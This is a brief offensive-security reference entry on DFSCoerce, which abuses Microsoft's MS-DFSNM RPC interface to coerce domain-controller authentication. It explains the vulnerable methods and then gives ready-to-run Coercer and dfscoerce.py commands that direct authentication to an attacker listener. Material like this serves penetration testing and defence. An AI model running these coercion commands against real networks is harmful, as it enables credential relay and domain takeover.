MS-DFSNM abuse (DFSCoerce)
Theory
MS-DFSNM is Microsoft's Distributed File System Namespace Management protocol. It provides an RPC interface for administering DFS configurations (docs.microsoft.com) and is available as an RPC interface. That interface is available through the \pipe\netdfs SMB named pipe.
In mid-2022, Filip Dragovic demonstrated the possibility of abusing the protocol to coerce authentications. Similarly to other MS-RPC abuses, this works by using a specific method relying on remote address. In this case (as of July 6th, 2022), the following methods were detected vulnerable: NetrDfsRemoveStdRoot and NetrDfsAddStdRoot. It is worth noting this coercion method only works against domain controllers.
Practice
Coercer (Python) can also be used to trigger all available MS-RPC coercions (including this one) in a single tool, with or without target filtering.
# Scan for available coercion methods
coercer scan -t $TARGET -u "$USER" -p "$PASSWORD" -d "$DOMAIN"
# Coerce authentication to attacker listener
coercer coerce -t $TARGET -l $ATTACKER_IP -u "$USER" -p "$PASSWORD" -d "$DOMAIN"The following Python proof-of-concept (https://github.com/Wh04m1001/DFSCoerce) implements the NetrDfsRemoveStdRoot and NetrDfsAddStdRoot methods.
dfscoerce.py -d "$DOMAIN" -u "$USER" -p "$PASSWORD" LISTENER TARGET